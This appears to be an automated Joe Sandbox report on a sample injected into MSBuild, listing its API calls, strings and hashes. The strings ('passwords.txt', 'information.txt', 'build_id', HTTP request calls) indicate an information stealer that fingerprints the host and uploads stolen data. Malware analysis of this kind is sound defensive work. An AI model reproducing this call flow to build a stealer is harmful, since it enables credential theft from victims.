call 40f890 call 40fbc0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fd30 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fde0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fda0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fed0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40ff40 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 410200 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40ffc0 call 40f940 call 40f8f0 call 40f890 * 2 call 40ffc0 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40fa50 lstrlenA call 40fa50 call 40f810 call 401080 call 4142a0 call 40f890 * 6
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040FB60: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004201E9,?,?,?,?,?,?,?,00416C7F,?), ref: 0040FB6E
                                                                                          • Part of subcall function 0040FB60: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004201E9,?,?,?,?,?,?,?,00416C7F,?), ref: 0040FB75
                                                                                          • Part of subcall function 0040FB60: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004201E9,?,?,?,?,?,?,?,00416C7F,?), ref: 0040FB81
                                                                                          • Part of subcall function 0040FB60: wsprintfA.USER32 ref: 0040FBAD
                                                                                          • Part of subcall function 00410340: memset.MSVCRT ref: 00410365
                                                                                          • Part of subcall function 00410340: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004201E9), ref: 00410382
                                                                                          • Part of subcall function 00410340: RegQueryValueExA.KERNEL32(004201E9,MachineGuid,00000000,00000000,00000000,000000FF), ref: 004103A4
                                                                                          • Part of subcall function 00410340: RegCloseKey.ADVAPI32(004201E9), ref: 004103AE
                                                                                          • Part of subcall function 00410340: CharToOemA.USER32(00000000,?), ref: 004103C2
                                                                                          • Part of subcall function 004103E0: GetCurrentHwProfileA.ADVAPI32(00000000), ref: 004103EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 00410420: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041043C
                                                                                          • Part of subcall function 00410420: GetVolumeInformationA.KERNEL32({kA,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410475
                                                                                          • Part of subcall function 00410420: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104BF
                                                                                          • Part of subcall function 00410420: HeapAlloc.KERNEL32(00000000), ref: 004104C6
                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00423684,00000000,?,00000000,00000000,004201E9), ref: 00414728
                                                                                          • Part of subcall function 00411090: OpenProcess.KERNEL32(00000410,00000000,?), ref: 004110A5
                                                                                          • Part of subcall function 00411090: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004110C0
                                                                                          • Part of subcall function 00411090: CloseHandle.KERNEL32(00000000), ref: 004110C7
                                                                                          • Part of subcall function 004105A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004105B5
                                                                                          • Part of subcall function 004105A0: HeapAlloc.KERNEL32(00000000), ref: 004105BC
                                                                                          • Part of subcall function 00410730: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 00410758
                                                                                          • Part of subcall function 00410730: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000), ref: 00410769
                                                                                          • Part of subcall function 00410730: CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?), ref: 00410783
                                                                                          • Part of subcall function 00410730: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?), ref: 004107BC
                                                                                          • Part of subcall function 00410730: VariantInit.OLEAUT32(?), ref: 0041081B
                                                                                          • Part of subcall function 00410900: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 00410928
                                                                                          • Part of subcall function 00410900: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000), ref: 00410939
                                                                                          • Part of subcall function 00410900: CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?), ref: 00410953
                                                                                          • Part of subcall function 00410900: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?), ref: 0041098C
                                                                                          • Part of subcall function 00410900: VariantInit.OLEAUT32(?), ref: 004109E3
                                                                                          • Part of subcall function 0040FB20: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00414941,00000000,?,Computer Name: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 0040FB2C
                                                                                          • Part of subcall function 0040FB20: HeapAlloc.KERNEL32(00000000,?,?,?,00414941,00000000,?,Computer Name: ,00000000,?,00423408,00000000,?,00000000,00000000,00000000), ref: 0040FB33
                                                                                          • Part of subcall function 0040FB20: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FB47
                                                                                          • Part of subcall function 0040FAE0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417612,004201E9), ref: 0040FAEC
                                                                                          • Part of subcall function 0040FAE0: HeapAlloc.KERNEL32(00000000,?,?,?,00417612,004201E9), ref: 0040FAF3
                                                                                          • Part of subcall function 0040FAE0: GetUserNameA.ADVAPI32(00000000,004201E9), ref: 0040FB07
                                                                                          • Part of subcall function 004102C0: CreateDCA.GDI32(0168EE88,00000000,00000000,00000000), ref: 004102D2
                                                                                          • Part of subcall function 004102C0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004102DD
                                                                                          • Part of subcall function 004102C0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004102E8
                                                                                          • Part of subcall function 004102C0: ReleaseDC.USER32(00000000,00000000), ref: 004102F3
                                                                                          • Part of subcall function 004102C0: GetProcessHeap.KERNEL32(00000000,00000104,?,00000030,?,00414A13,?,00000000,?,Display Resolution: ,00000000,?,00423408,00000000,?,00000000), ref: 00410300
                                                                                          • Part of subcall function 004102C0: HeapAlloc.KERNEL32(00000000,?,00000030,?,00414A13,?,00000000,?,Display Resolution: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 00410307
                                                                                          • Part of subcall function 004102C0: wsprintfA.USER32 ref: 00410317
                                                                                          • Part of subcall function 0040FC30: GetKeyboardLayoutList.USER32(00000000,00000000,004201E9,00000000,?,00000030), ref: 0040FC4D
                                                                                          • Part of subcall function 0040FC30: LocalAlloc.KERNEL32(00000040,00000000,?,00000030), ref: 0040FC5F
                                                                                          • Part of subcall function 0040FC30: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000030), ref: 0040FC69
                                                                                          • Part of subcall function 0040FC30: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000030), ref: 0040FC93
                                                                                          • Part of subcall function 0040FC30: LocalFree.KERNEL32(00000000,?,00000030), ref: 0040FD16
                                                                                          • Part of subcall function 0040FBC0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FBD1
                                                                                          • Part of subcall function 0040FBC0: HeapAlloc.KERNEL32(00000000), ref: 0040FBD8
                                                                                          • Part of subcall function 0040FBC0: GetTimeZoneInformation.KERNEL32(?), ref: 0040FBE7
                                                                                          • Part of subcall function 0040FBC0: wsprintfA.USER32 ref: 0040FC12
                                                                                          • Part of subcall function 0040FD30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FD45
                                                                                          • Part of subcall function 0040FD30: HeapAlloc.KERNEL32(00000000), ref: 0040FD4C
                                                                                          • Part of subcall function 0040FD30: RegOpenKeyExA.KERNEL32(80000002,01690790,00000000,00020119,00000000), ref: 0040FD6B
                                                                                          • Part of subcall function 0040FD30: RegQueryValueExA.KERNEL32(00000000,01699B08,00000000,00000000,00000000,000000FF), ref: 0040FD86
                                                                                          • Part of subcall function 0040FD30: RegCloseKey.ADVAPI32(00000000), ref: 0040FD90
                                                                                          • Part of subcall function 0040FDE0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FE02
                                                                                          • Part of subcall function 0040FDE0: GetLastError.KERNEL32(?,00000030), ref: 0040FE10
                                                                                          • Part of subcall function 0040FDE0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 0040FE48
                                                                                          • Part of subcall function 0040FDE0: wsprintfA.USER32 ref: 0040FE92
                                                                                          • Part of subcall function 0040FDA0: GetSystemInfo.KERNEL32(00000000), ref: 0040FDAD
                                                                                          • Part of subcall function 0040FDA0: wsprintfA.USER32 ref: 0040FDC3
                                                                                          • Part of subcall function 0040FED0: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408), ref: 0040FEDE
                                                                                          • Part of subcall function 0040FED0: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408,00000000), ref: 0040FEE5
                                                                                          • Part of subcall function 0040FED0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 0040FF05
                                                                                          • Part of subcall function 0040FED0: wsprintfA.USER32 ref: 0040FF2B
                                                                                          • Part of subcall function 0040FF40: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 0040FF71
                                                                                          • Part of subcall function 0040FF40: EnumDisplayDevicesA.USER32(00000000,00000001,000001A8,00000001), ref: 0040FFA9
                                                                                          • Part of subcall function 00410200: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410228
                                                                                          • Part of subcall function 00410200: Process32First.KERNEL32(00000000,00000128), ref: 00410238
                                                                                          • Part of subcall function 00410200: Process32Next.KERNEL32(00000000,00000128), ref: 0041024A
                                                                                          • Part of subcall function 00410200: Process32Next.KERNEL32(00000000,00000128), ref: 0041029E
                                                                                          • Part of subcall function 00410200: CloseHandle.KERNEL32(00000000), ref: 004102A9
                                                                                          • Part of subcall function 0040FFC0: RegOpenKeyExA.KERNEL32(00000000,01696E38,00000000,00020019,00000000,004201E9), ref: 00410009
                                                                                          • Part of subcall function 0040FFC0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410052
                                                                                          • Part of subcall function 0040FFC0: wsprintfA.USER32 ref: 0041007C
                                                                                          • Part of subcall function 0040FFC0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041009A
                                                                                          • Part of subcall function 0040FFC0: RegQueryValueExA.KERNEL32(00000000,0169A7A0,00000000,000F003F,?,00000400), ref: 004100CA
                                                                                          • Part of subcall function 0040FFC0: lstrlenA.KERNEL32(?), ref: 004100DF
                                                                                          • Part of subcall function 0040FFC0: RegQueryValueExA.KERNEL32(00000000,0169A578,00000000,000F003F,?,00000400,00000000,?,?,00000000,80000002,00423408), ref: 00410156
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00423684,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00414F07
                                                                                          • Part of subcall function 004142A0: Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
                                                                                          • Part of subcall function 004142A0: CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
                                                                                          • Part of subcall function 004142A0: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$Alloc$wsprintf$CreateOpen$CloseInformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                        • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt

                                                                                        Control-flow Graph

                                                                                        • control_flow_graph 2260, starting at 405bb0 (graph not preserved; legend: Executed / Not Executed)
                                                                                        APIs
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
                                                                                          • Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
                                                                                          • Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C3C
                                                                                        • StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,00000030), ref: 00405C57
                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405D9D
                                                                                        • HttpOpenRequestA.WININET(00000000,0169A460,?,0169B128,00000000,00000000,-00400100,00000000), ref: 00405DD9
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00416BDF,?,00000000,00416BDF,",00000000,00416BDF,mode,00000000,00416BDF,0168FC00,00000000,00416BDF,00423358), ref: 0040611D
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000030), ref: 0040612E
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406139
                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406140
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406151
                                                                                        • memcpy.MSVCRT ref: 00406162
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00406173
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000030), ref: 0040618C
                                                                                        • memcpy.MSVCRT ref: 00406195
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004061A8
                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004061B9
                                                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 004061D0
                                                                                        • InternetReadFile.WININET(00000000,00000000,000000C7,?), ref: 00406225
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00406230
                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405DFD
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0040623A
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00406247
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
                                                                                        • String ID: "$------$build_id$mode

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,0168FCC0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040BFD7
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C00B
                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C069
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040C070
                                                                                        • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C10C
                                                                                        • lstrcatA.KERNEL32(00000000,0168EF98), ref: 0040C123
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040C133
                                                                                        • lstrcatA.KERNEL32(00000000,004234BC), ref: 0040C13F
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040C14F
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
                                                                                          • Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
                                                                                          • Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
                                                                                          • Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
                                                                                          • Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
                                                                                          • Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
                                                                                          • Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1
                                                                                        • lstrcatA.KERNEL32(00000000,004234B8), ref: 0040C15B
                                                                                        • lstrcatA.KERNEL32(00000000,0168EE08), ref: 0040C169
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040C179
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040C185
                                                                                        • lstrcatA.KERNEL32(00000000,0168EE28), ref: 0040C192
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040C1A2
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040C1AE
                                                                                        • lstrcatA.KERNEL32(00000000,016996C8), ref: 0040C1BC
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040C1CC
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040C1D8
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040C1E4
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040C211
                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040C275
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$lstrcpy$HeapProcess$Filelstrlen$Copy$AllocAllocateCloseDeleteHandleOpenSystemTerminateTimememsetwsprintf
                                                                                        • String ID: passwords.txt
                                                                                        • API String ID: 2344884248-347816968
                                                                                        • Opcode ID: 6c6631d7537a75886b13321184486968400d058f1e88fc6ffe80464b267e8130
                                                                                        • Instruction ID: 967a70a3d716286beb5b4252a3fafd026a216bdc4be784f124d06add54286a45
                                                                                        • Opcode Fuzzy Hash: 6c6631d7537a75886b13321184486968400d058f1e88fc6ffe80464b267e8130
                                                                                        • Instruction Fuzzy Hash: DBA14D72A00105ABCB14FBA1ED5ADEE377DAF54305F149039F502B2591EF386A09CBB9
                                                                                        APIs
                                                                                          • Part of subcall function 0040FA20: StrCmpCA.SHLWAPI(?,00423410,?,004090A5,00423410,00000000), ref: 0040FA2A
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040725E
                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040744B
                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00407452
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00407292
                                                                                          • Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
                                                                                          • Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,0169A230,00423410,0169A230,00423410,00000000), ref: 0040757D
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 00407589
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00407599
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 004075A5
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 004075B5
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 004075C1
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 004075D1
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 004075DD
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 004075ED
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 004075F9
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00407609
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 00407615
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00407652
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 00407666
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 004076B3
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 004076BF
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • DeleteFileA.KERNEL32(00000000,?,?,?,004201E9), ref: 0040771A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$File$CopyHeap$AllocateDeleteProcess
                                                                                        • String ID:
                                                                                        • API String ID: 510441641-0
                                                                                        • Opcode ID: b115433a796c70727ddb27c2892003f97d66e6a6fffaa7df257ef16394880564
                                                                                        • Instruction ID: 7c427e6bb88bbe56a8d38efa81964618216df7dc27c3b8011e4d2415417106fc
                                                                                        • Opcode Fuzzy Hash: b115433a796c70727ddb27c2892003f97d66e6a6fffaa7df257ef16394880564
                                                                                        • Instruction Fuzzy Hash: 82026D72A10104ABCB24FBA1DC56DEE7779AF10305F54813AF506764E2EF386A0DCB69
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,0168FCC0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408E75
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408EAA
                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00408FC9
                                                                                        • lstrcatA.KERNEL32(00000000,00000000,0169A230,00423410,0169A230,00423410,00000000), ref: 004090F3
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 004090FF
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040910F
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 0040911B
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040912B
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 00409137
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00409147
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 00409153
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 00409163
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 0040916F
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040917F
                                                                                        • lstrcatA.KERNEL32(00000000,0042340C), ref: 0040918B
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040919B
